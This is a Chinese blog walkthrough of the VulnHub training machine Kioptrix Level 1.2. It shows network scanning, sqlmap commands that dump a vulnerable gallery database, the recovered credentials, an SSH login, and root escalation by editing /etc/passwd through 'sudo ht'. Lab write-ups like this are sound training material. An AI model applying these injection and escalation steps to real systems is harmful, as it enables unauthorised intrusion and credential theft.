VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

最新推荐文章于 2023-05-23 21:50:58 发布
最新推荐文章于 2023-05-23 21:50:58 发布
阅读量1.1k 收藏 3
点赞数 2
分类专栏: # VulnHub 文章标签: VulnHub 渗透测试 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/119523573
版权

VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2

环境下载

戳此进行环境下载

KIOPTRIX: LEVEL 1靶机搭建

将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
得到目标靶机的IP为:192.168.246.135

在这里插入图片描述

用Nmap探测一下目标靶机IP的端口信息:sudo nmap -sS -A 192.168.246.135,发现开放了22和80两个端口

在这里插入图片描述

用dirb扫描一下web目录:dirb http://192.168.246.135

在这里插入图片描述

漏洞挖掘

测试后发现需要添加一个host

在这里插入图片描述

发现http://192.168.246.135/gallery/gallery.php?id=1存在SQL注入漏洞

在这里插入图片描述

利用sqlmap得到数据库名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 --dbs

在这里插入图片描述

利用sqlmap得到gallery数据库中的表名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 -D gallery --tables

在这里插入图片描述

利用sqlmap得到gallery数据库中的表名:sqlmap -u http://192.168.246.135/gallery/gallery.php?id=1 -D gallery -T gallarific_users --columns

在这里插入图片描述

得到一组用户名和密码:admin:n0t7t1k4

在这里插入图片描述

在另一个表dev_accounts中,得到了两组用户名和密码

在这里插入图片描述

dreg:Mast3r
loneferret:starwars

getshell

利用上述得到的信息,发现后两组用户名和密码可以成功连接ssh

在这里插入图片描述

提权

查看/etc/passwd发现loneferret用户存在利用点

在这里插入图片描述

查看loneferret用户家目录下信息

在这里插入图片描述

根据提示,使用sudo ht命令,修改/etc/passwd中loneferret用户和root用户一样

在这里插入图片描述

重新连接ssh,发现成功提权到root用户

在这里插入图片描述

H3rmesk1t
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之Kioptrix Level 1.1 靶机渗透(万能密码 命令注入)
afei001
04-16 993
练习环境     攻击机:kali     靶机:Kioptrix: Level 1.1 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_2-update.rar 1.发现靶机,端口扫描 root@kali:~# netdiscover -r 192.168.43.0/16 ________________________...
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1058
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
KIOPTRIX: LEVEL 1.2 (#3)
Katarina__的博客
09-04 613
KIOPTRIX: LEVEL 1.2 (#3) 攻击机IP:192.168.253.143 靶机IP:192.168.253.144 一、信息收集 1、确定目标主机IP、开放端口 使用netdiscover确定网段内目标主机。 netdiscover -i eth0 -r 192.168.253.0/24 (主动探测网段内活动主机) 也可使用nmap扫固定网段 nmap -sP 192.168.253.0/24 找到ip后,可继续使用nmap探测此主机的开放端口等信息 nmap -n -
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ 靶机设置 老规矩,开启虚拟机前分配一个和攻击机一样的网卡,选择我已移动该虚拟机;开启虚拟机后,netdiscover确认一下目标,我的靶机ip为192.168.190.189 靶机描述里还要配置host指向kioptrix3.com vim /etc/hosts 利用知识及工具 信息收集并getsh
vulnhub-KIOPTRIX: LEVEL 1.2 (#3)-KioptrixVM3靶场
shulao2010的博客
05-23 363
一个单机靶场,讲解了如何通过简单web漏洞获得主机root权限
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-Kioptrix Level #4
最新发布
06-12
vuInhub靶场实战系列-Kioptrix Level #4
vuInhub靶场实战系列-Kioptrix Level #3
06-10
vuInhub靶场实战系列-Kioptrix Level #3
vulnhub- Kioptrix: Level 1.2 (#3) (考点 :lotusCMS/phpadmin/ssh/ht/linux知识/linux提权)
冬萍子癸水
04-20 973
arp-scan -l 多出来的那个机子就是 nmap。很常规,22要想到可能有ssh登录,80就是进网页找信息 C:\root\Desktop> nmap -A 192.168.189.162 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-19 21:06 EDT Nmap scan report for 192.168.189.16...
Vulnhub-靶机-Kioptrix: Level 1.2 (#3)
qq_43264813的博客
01-28 730
Vulnhub—靶机—Kioptrix: Level 1.2 (#3) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub—靶机—Kioptrix: Level 1.2 (#3)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -n -sC -s
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.3
LYJ20010728的博客
08-09 668
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.3环境下载KIOPTRIX: LEVEL 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权补充 环境下载 戳此进行环境下载 KIOPTRIX: LEVEL 1靶机搭建 由于压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘 将原来的硬盘删去,选择下载好的靶机硬盘,并将网络适配器设置为NAT模式 打开靶机即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan
VulnHub——Kioptrix Level 3
江左盟的博客
05-28 2967
目录 简介 信息收集 漏洞检测与利用 权限提升 总结 简介 该靶机还是一如既往的简单,通过信息收集发现Web服务使用LotusCMS,使用Google搜索发现存在已知漏洞,通过漏洞利用脚本获得webshell,然后通过内核漏洞直接提升权限到root。 信息收集 探测目标主机IP地址,如图: 然后对目标主机进行快速端口扫描,发现开启22和80端口,OpenSSH版本4.7p1,Apache版本2.2.8,PHP版本5.2.4-2,操作系统可能为Debian或Ubuntu,内核版本为2.
【Nginx三】——Nginx实现反向代理
理想主义的花最终会盛开在浪漫主义的土壤里,我的热情永远不会熄灭在现实的平凡之中,我们终将上岸,阳光万里。
03-30 2177
本篇博客主要介绍Nginx如何实现反向代理,会进行介绍什么是反向代理,以及进行实例实现反向代理。不难看出反向代理对于客户端来说不知道目的服务器,客户端只知道请求代理服务器能够获取到需要的资源。而代理服务器可以通过相应的配置拦截前往我们后端服务器的客户端的请求,通过这样做,代理服务器可以保护目的服务器的身份并作为对安全攻击的额外防御。
Nginx反向代理配置
热门推荐
weixin_42751488的博客
04-14 9万+
nginx反向代理配置
Kioptrix: Level 1.1 (#2)
战神/calmness的博客
06-04 949
下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ 目标机器:192.168.243.147 攻击机器:192.168.210.134 目录 信息收集 万能和密码破解 命令执行 反弹shell 监听 提权 版本内核 linux 2.6.9 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (proto...
SQL靶场8-10:注入与数据库爆破实战
在SQL靶场的第8-10关挑战中,主要涉及了SQL注入技术的实战应用。这一系列的题目旨在帮助学习者理解和掌握如何在实际环境中检测并利用SQL注入漏洞。以下是每个步骤的关键知识点: 1. **识别注入点**: - 首先,尝试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值